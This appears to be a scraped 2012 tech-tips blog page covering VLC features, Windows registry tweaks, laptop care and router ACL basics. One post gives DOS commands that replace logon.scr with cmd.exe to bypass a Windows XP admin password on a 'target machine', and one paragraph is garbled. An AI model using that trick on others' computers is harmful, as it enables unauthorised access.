Pages

Braniac Bhai Headline Animator

Search This Blog

Jul 6, 2012

7 Things You Didn’t Know VLC Could Do

7 Things You Didn’t Know VLC Could Do






VLC media player is one of the most popular player for  most people. It as got almost all codecs. VLC can do a lot of other things beyond your imagination.
Find out how many of these listed below you knew, and how many you did not.

1. Rip DVDs:

VLC includes a basic DVD ripper. You probably would never use it when there are better DVD rippers available, but it helps to know that you can in fact, get a decent quality DVD rip with VLC. To rip a movie follow these steps: Go to the Media menu and choose Convert–>Save. Click on the Disc tab.
  • Here you can adjust the Starting Position and rip only specific titles or chapters.
  • Enter file name making sure to end with .MPG, and start ripping.
  • Click Save.

2. Record videos:

With the new VLC, you can record videos during playback. The record button is hidden by default. To see it, click on View–>Advanced Control. The record button will now appear. Clicking on the button while playing a movie or video will start recording. Clicking again will stop recording.

3. Play RAR files:

Do you know VLC can play videos zipped inside RAR files? They play like normal video files and you can even use the seek bar. If the RAR file is split into several files, no problem. Just load the first part (.part001.rar ) and it will automatically take the rest of the parts and play the whole file.

4. Play in ASCII mode:

VLC media player has an amusing ability, to playback movies in ASCII art. To enable ASCII mode, open VLC media player and click on Tools –>Preferences. Open the section “Video” section and under “Output” select “Color ASCII art video output” from the drop down menu. Save it. Now play any video file to enjoy the ASCII art.

5. Listen to online radio:

VLC includes hundreds of Shoutcast radio stations. You just need to enable it through Media –>Services Discovery –> Shoutcast radio listings. Now, open the Playlist and browse through the stations.

6. Convert Audio and Video formats:

In VLC you can convert video and audio files from one format to another. Several different formats are supported like MP4, WMV, AVI, OGG, MP3 etc. To access the converter:
* Go to Media –>Convert/Save.
* Load the file you want to convert using the Add button and click Convert.
* Now choose the output format and output file location.

7. Download YouTube and other online videos:

First grab the URL of the YouTube video page. Now click on Media –>Open Network stream.Paste the URL and click Play.

Once VLC starts streaming the video, click Tools –>Codec Information and at the bottom of the window you will see a Location box. Copy the URL and paste it on your browser’s address bar. The browser will now download the file which you can save it to your hard disk. Alternatively, you can record the video.

How to Create a New Folder using Windows Keyboard Shortcut Keys

How to Create a New Folder using Windows Keyboard Shortcut Keys





Usually we create new folder in windows by right clicking and then going to New –> Folder. But how to create a new folder using keyboard shortcuts?
Hold down Alt key + F, then let go of the Alt key and press W + F.
This will create new folder.:)

The above step works for Windows XP, Vista and Windows 7.But Windows 7 is very much user friendly.Just press Ctrl + Shift + N to create a new folder instantly in Windows 7.;)


Tips for Maintaining Your Laptop

Tips for Maintaining Your Laptop


Nowadays, many people are using laptops for their school work, business or leisure. However, laptops can lose their efficiency if not well-maintained. The following are some tips which will help enhance your laptop usage.

1. Watch out for dust
To ensure your laptop remains effective for a long time, you need to protect it from dust. An accumulation of dust in your laptop could block the ventilation areas and result in overheating. It is therefore very important to keep your laptop from being exposed to dust.

2. Keep it cool
Besides dust, it is also very important to protect your laptop from excessive heat. A laptop used in a cool, dry area will work more effectively and faster than if it was exposed to heat. To protect your laptop from overheating, avoid using it on your lap, bed or cushion since this will block the vents underneath which help in cooling. The best solution for this is to use a lap tray as a base for your laptop. Alternatively, you can invest in any of the laptop coolers which are sold in most computer stores.

3. Install a firewall and antivirus software
If you don’t use any antivirus, your laptop remains vulnerable to being infected by a virus. Make sure you use proper antivirus software to protect your laptop and keep it effective for longer. You should also install a firewall so as to restrict access to your laptop. A firewall will alert you anytime an external entity tries to access your laptop. You will then have the option of either blocking or allowing access. In addition, you need to be cautious about using external hard disks and flash disks with your laptop.

4. Eliminate unused programs
At times, you might have some programs in your laptop that you don’t really need. It is advisable to uninstall them so as to create more space in your hard drive. This will enable you to install other important applications and programs. Eliminating unused programs will also improve your laptop’s performance and make it easier to locate important files.

5. De-fragment hard drives
When you have many programs in your laptop, it will take time to locate your important files. It is therefore very vital to DE-fragment your drives frequently. De-fragmenting will arrange your files in a way which makes them much easier to access.

6. Clean your registry
Once in a while, registry files might get corrupted thus resulting in a drastic and sudden change in your laptop’s performance. Make sure you run your registry cleaners frequently to find out if there are any corrupt files or errors.

7. Minimize programs to run during start-up
Whenever you start your laptop, it will load all the system files, as well as the programs which have been selected to run during start-up. The more programs you run, the longer it takes to start-up. You should therefore minimize the number of programs that will run during the booting process.

8. Delete temporary internet files
Slow browsing speeds are often as a result of poor internet connection. However, in some cases, it might be due to too many temporary internet files saved in your laptop. You should therefore take time to delete such files from your laptop.

9. Empty the recycle bin
When files are deleted from your laptop, they end up in the recycle bin. This means that they are not actually deleted from the laptop; they have just been transferred to a different location. Thus, they still take up space in your hard drive. It is therefore important to empty your recycle bin as often as possible.

10. Power surge protection
Power surge protection is as important for laptops as it is for desktop computers. Replacing a laptop power supply is very costly compared to investing in a power surge protection device. Make sure you get one so as to protect the laptop itself, as well as your laptop power supply.

Talking Mobile Dictionary

Talking Mobile Dictionary


Dictionary is very important parts of our life. We need to know some important word meaning. For this we search word meaning in fat and big dictionary. Today I give you a mobile a Talking Mobile Dictionary which can talk with you. It told you the meaning of the complex word. The mobile application for the English to English and English to Bengali Dictionary, rich in meaning, but they just can not show on the screen. The correct English pronunciation can be learned from this is not a smartphone. The problem is Talking Dictionary. As well as the proper British pronunciation of each word means antipasti be heard. In Hindi, Arabic, French, German, Spanish and Italian language word to be heard. There are copious in words as well as additional discriminate history, synonyms and opposite words. The limitation is, it does not have the benefit of listening to Bengali accent.



How to Download
Click on the link wait 5 second and click ad skip on right upper side on the page.

Feb 24, 2012


How to Troubleshoot RAM Memory


When you have memory problems, you know you are limited in your troubleshooting and hopefully you will be able to resolve the problem quickly. It’s a great idea to first verify the problem exist.

Shutdown and reboot your computer to see if the problem re-appears. Sometimes rebooting the PC will correct the problem and you'll be on your way.

Feb 23, 2012

How To Hack Windows XP Admin Password

How To Hack Windows XP Admin Password


If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Lock Any Folder Using DOS

Lock Any Folder Using DOS


Friends Hide your folders with out using any soft. just go to,

Start.....>

run.....>

cmd....>

note 1 "_" give 1 space on that place

note 2 ex:- if your folder is at D drive then

Kill Yahoo Chat Room Ads

Kill Yahoo Chat Room Ads...


Create a new text document, copy and paste the following...

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Yahoo\Pager\yurl]
"Finance Disclaimer"="http://msg.edit.yahoo.com/config/jlb"
"Chat Adurl"="http://chat.yahoo.com/c/msg/tabs.html?spaceid=21501837"

Doesn't matter what you name it, as long as you change it from .txt to .reg.

It works well with my Yahoo, should work the same for everyone else as well.

Feb 22, 2012

How to Configure Extended Access List On Router

Configure Extended Access Lists


An extended ACL gives you much more power than just a standard ACL. Extended IP ACLs check both the source and destination packet addresses. They can also check for specific protocols, port numbers, and other parameters, which allow administrators more flexibility and control.

access-list access-list-number {permit | deny}
protocol source source-wildcard [operator port]
destination destination-wildcard [operator port]
[established] [log]
 
Command Parameters Descriptions
access-list Main command
access-list-number Identifies the list using a number in the ranges of 100.199 or 2000. 2699.
permit | deny Indicates whether this entry allows or blocks the specified address.
protocol IP, TCP, UDP, ICMP, GRE, or IGRP.
source and destination Identifies source and destination IP addresses.
source-wildcard and destination-wildcard The operator can be lt (less than), gt (greater than), eq (equal to), or neq (not equal to). The port number referenced can be either the source port or the destination port, depending on where in the ACL the port number is configured. As an alternative to the port number, well-known application names can be used, such as Telnet, FTP, and SMTP.
established For inbound TCP only. Allows TCP traffic to pass if the packet is a response to an outbound-initiated session. This type of traffic has the acknowledgement (ACK) bits set. (See the Extended ACL with the Established Parameter example.)
log Sends a logging message to the console.

How to Configure Standard Access List On Router

Standard Access Lists


Because a standard access list filters only traffic based on source traffic, all you need is the IP address of the host or subnet you want to permit or deny. ACLs are created in global configuration mode and then applied on an interface. The syntax for creating a standard ACL is
access-list {1-99 | 1300-1999} {permit | deny} source-address
 [wildcard mask]
In this article we will configure standard access list. If you want read the feature and characteristic of access list reads this previous article.


In this article we will use a RIP running topology. Which we created in RIP routing practical.


Access Control List Standard Extended

Access Control List


ACLs are basically a set of commands, grouped together by a number or name that is used to filter traffic entering or leaving an interface.
When activating an ACL on an interface, you must specify in which direction the traffic should be filtered:
  • Inbound (as the traffic comes into an interface)
  • Outbound (before the traffic exits an interface)
Inbound ACLs:
Incoming packets are processed before they are routed to an outbound interface. An inbound ACL is efficient because it saves the overhead of routing lookups if the packet will be discarded after it is denied by the filtering tests. If the packet is permitted by the tests, it is processed for routing.

Outbound ACLs:
Incoming packets are routed to the outbound interface and then processed through the outbound ACL.

Network Security Mitigating Common Threats

Network Security Mitigating Common Threats


Improper and incomplete network device installation is an often-overlooked security threat that, if left unaddressed, can have terrible results. Software-based security measures alone cannot prevent intended or even accidental network damage caused by poor installation. Now we will describe how to mitigate common security threats to Server Routers and Switches.

Physical Installations

Physical installations involve four types of threats:
hardware, electrical, environmental, and maintenance.

Hardware threats

Hardware threats involve threats of physical damage to the router or switch hardware. Mission-critical Cisco network equipment should be located in wiring closets or in computer or telecommunications rooms that meet these minimum requirements:

Network Security Types of Attack Reconnaissance Attack

Reconnaissance Attacks


A reconnaissance attack occurs when an adversary tries to learn information about your network.

Reconnaissance is the unauthorized discovery and mapping of systems, services, or vulnerabilities.

Reconnaissance is also known as information gathering and, in most cases, precedes an actual access or DoS attack. First, the malicious intruder typically conducts a ping sweep of the target network to determine which IP addresses are alive. Then the intruder determines which services or ports are active on the live IP addresses. From this information, the intruder queries the ports to determine the type and version of the application and operating system running on the target host.

Feb 21, 2012

How To Remove OS Choice From Booting Menu

How To Remove OS Choice From Booting Menu


Right click on "my computer”. Click "properties”. Then click on "advanced" tab. click on "settings" in bottom most column "startup & recovery”. Click on” edit" & notepad file will come up. It should contain only one line something like this (not necessarily same but similar).

Quote:

Network Security Types of Attack Passive Attack Active Attack

Network Security


A security policy defines what people can and can't do with network components and resources.

Need for Network Security

In the past, hackers were highly skilled programmers who understood the details of computer communications and how to exploit vulnerabilities. Today almost anyone can become a hacker by downloading tools from the Internet. These complicated attack tools and generally open networks have generated an increased need for network security and dynamic security policies.

The easiest way to protect a network from an outside attack is to close it off completely from the outside world. A closed network provides connectivity only to trusted known parties and sites; a closed network does not allow a connection to public networks.
Because they have no Internet connectivity, networks designed in this way can be considered safe from Internet attacks. However, internal threats still exist.
There is a estimates that 60 to 80 percent of network misuse comes from inside the enterprise where the misuse has taken place.

Network Definitions Characteristics Components locations

What Is a Network?


The first assignment in understanding how to build a computer network is defining what a network is and understanding how it is used to help a business meet its objectives.

Network is a combination of computer hardware, cabling, network devices, and computer software used together to allow computers to communicate with each other.

Or

A network is basically all of the components (hardware and software) involved in connecting computers across small and large distances. Networks are used to provide easy access to information, thus increasing productivity for users.

Network hardware is mainly made by two basic components: the entities that want to share the information or resources, such as servers and workstations, and the medium that enables the entities to communicate, which is a cable or a wireless medium

How to Easily and Safely Install RAM

How to Easily and Safely Install RAM




Check to see if you have ample light. You may want to have a container to place small
screws in. The system unit cover may have small screws and you don't want to lose them.

After you have plenty of work space and ample lighting, prepare your mind as well. Make
this and every other adventure of working on your computer educational and fun.

Install More RAM In Your Laptop For More Speed



Install More RAM In Your Laptop For More Speed


Your Laptop is indeed your companion, especially when you're on the go. We often take
both our laptops on vacation, in town to catch up on some work. And boosting your
knowledge of your laptop with go a long long way in saving you money by repairing it
yourself.

Installing memory is one of the easiest tasks. Take the time to first be sure you have the
right RAM for your computer. If you're in doubt take it back to the place of purchase and
be sure you have the right RAM. After being certain you have the right RAM, you're ready
to open the system unit and begin. But first, you need to remove static electricity.

First: Turn Off the Laptop and remove the Battery, normally located on the bottom of
the computer.

Second: Turn the Laptop over and locate the RAM compartment. Some Laptops
Memory Module Compartments may be located in another area. Check your owner's
manual to be certain.

Feb 18, 2012

Disable Notification Area Balloon Tips In Windows XP

Disable Notification Area Balloon Tips In Windows XP


To Disable the Notification Area Balloon Tips

Warning: If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.

1. Click Start, click Run, type regedit, and then press ENTER.

Create A Shortcut To Lock Your Computer

Create A Shortcut To Lock Your Computer


Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.

To create a shortcut on your desktop to lock your computer:

Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation

Changing The MaxMTU For Faster Downloads

Changing The MaxMTU For Faster Downloads


There are four Internet settings that can be configured, you can get greater throughput (faster Internet downloads) by modifying a few settings.

They are the MaxMTU, MaxMSS and DefaultRcvWindow, and DefaultTTL.
1. Open RegEdit.
2. Go to
HKEY_LOCAL_MACHINE\System\CurrentControlset\Services\Class\net\000x
(where x is your particular network adapter binding).

Changing The Location Of Windows Installation Files

Changing The Location Of Windows Installation Files


If you need to change the drive and or path where Windows looks for its installation files:

1. Open RegEdit.
2. Go to

HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Setup
3. Edit the value next to SourcePath.

Change DOS Color

Change DOS Color



SYNTAX Sets the default console foreground and background colors.
COLOR [attr]

attr Specifies color attribute of console output 

Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the below values.

0 = Black
8 = Gray
1 = Blue
9 = Light Blue
2 = Green
A = Light Green
3 = Aqua
B = Light Aqua
4 = Red
C = Light Red
5 = Purple
D = Light Purple
6 = Yellow
E = Light Yellow
7 = White
F = Bright White

Feb 17, 2012

Clear CMOS - All Tricks

Clear CMOS - All Tricks


Entering Debug:

Debug has been included in every version of MS-DOS as well as Windows. When running any of the debug routines it is recommended that if you have Windows that you exit or shut down to get into a real DOS prompt (unless you're running Windows ME, Windows 2000, Windows XP, or later versions).

Once at the MS- DOS prompt, run through the below example, this example is perfectly fine to run on any PC Computer running MS-DOS / Windows and will not harm anything. Type debug and press enter. This should get you to a - (small dash). This is the debug prompt. At the - type d40:00 and press enter; this will return several lines of information. After the feedback you will be back to the debug prompt. To exit out of debug type q and press enter. This will return you back to the MS-DOS prompt.

In some of the below debug routines you will notice that a "g" is typed, then "q". G tells the computer that the code type is not self executing and must be run at this point. If completed, the program will return Program Terminated Normally which indicates you can now quit from the debug program.
Testing Ports:

Auto Window Refresh

Auto Window Refresh 


Whenever you make a change to your windows you have to press F5 or do a manual refresh.
With this tweak you can tell windows to increase the rate at which it does the refreshing.
Navigate to the key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update

Create a new DWORD value, or modify the existing value, named UpdateMode and set it to equal "0" for faster updates. Restart Windows for the change to take effect.

Alphabetize Your Start Menus Program List

Alphabetize Your Start Menus Program List 


Manual Instructions: 

1. Click Start -> Programs

2. Mouseover an item on the Programs list

3. Right-click or hit the context menu button (or Shift+F10)

Add A Website Link To Start Menu

Add A Website Link To Start Menu


To Install : Copy the code below to notepad and save it as link.reg then just right click on it and choose "merge".

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}]
@="TweakXP.com"

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon]
@="%SystemRoot%\\system32\\shell32.dll,-47"

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance\InitPropertyBag]
"CLSID"="{13709620-C279-11CE-A49E-444553540000}"
"method"="ShellExecute"
"Command"="Wehackers.blogspot.com"
"Param1"="http://www.wehackers.blogspot.com"

To uninstall : Copy the code below to notepad and save as rem.reg and right click and choose merge.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}]
@=""

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\DefaultIcon]
@=""

[HKEY_CLASSES_ROOT\CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}\Instance\InitPropertyBag]
"CLSID"="{13709620-C279-11CE-A49E-444553540000}"
"method"="ShellExecute"
"command"=""
"Param1"=""

Force Windows XP To Reboot Upon Crashing

 Force Windows XP To Reboot Upon Crashing


This registry edit will cause your system to reboot itself automatically upon crashing. This can be useful if you have a reason for
keeping your system on 24/7:

1. Open REGEDIT.
2. Navigate to 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl'.
3. Edit the 'AutoReboot' value to '1'.

Jan 30, 2012

How to Use Windows XP: Setting Up a Network Printer

How to Use Windows XP: Setting Up a Network Printer


Preparation
In order to install a network printer, you must know your printer's Manufacturer, Model Name, and IP Address.
  • The Manufacturer and Model Name can be found on the printer case, an example is HP LaserJet 4000N .
  • The IP Address can be found on a label attached to the printer. An example of the IP Address is 141.161.888.999.
If your printer does not have a label indicating the IP Address, or you can't identify what model it is, please call your Help Desk.